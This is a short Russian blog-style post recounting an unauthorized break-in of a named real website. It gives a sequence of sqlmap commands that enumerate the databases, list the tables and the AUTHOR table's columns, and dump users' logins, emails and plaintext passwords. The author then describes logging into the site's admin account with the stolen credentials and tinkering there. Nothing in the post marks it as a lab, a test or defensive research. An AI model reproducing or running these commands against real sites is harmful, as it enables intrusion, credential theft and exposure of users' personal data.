Пример взлома сайта.

Для взлома, будет применяться утилита SQLMAP. Проверяем сайт на уязвимость на SQL-инъекции. Уязвим! Запускаем утилиту командой

sqlmap -u www.supersleep.ru/?ITEM_ID=2776. --dbs
Получаем две базы.

information_schema
 supersleep
Первую не трогаем, она стандартна дря всех сайтов. Интересует supersleep. Далее, команда

sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep --tables

Получаем это.

Ничего со словом "админ" не видно, зато есть "AUTHOR", в нём должно прятаться то, что нам нужно. Следующая команда

sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR --columns

Выдало вот это.

Интересуют логины с паролями и мыльники. Задаём утилите такую команду

sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR -C login --dump

Выдало логины

А эта команда

sqlmap -u www.supersleep.ru/?ITEM_ID=2776.

-D supersleep -T AUTHOR -C EMAIL --dump

выдала мыльники всех зарегистрированных

Далее, интересуют пароли. Команда такая

sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR -C PASSWORD --dump

Вот они родимые! И снова в незашифрованном виде.

Идём на сайт http://supersleep.ru/ Вводим логопас и попадаем внутрь. О, да это не к обычному пользователю попала, а в акк администрации.

С управлением ушками, шото ничё не поняла.)))

Мдааа...

Эт немного поприкалывалась, потом вернула как было.

Хотела сайтик себе завести. Усё, чёта передумала.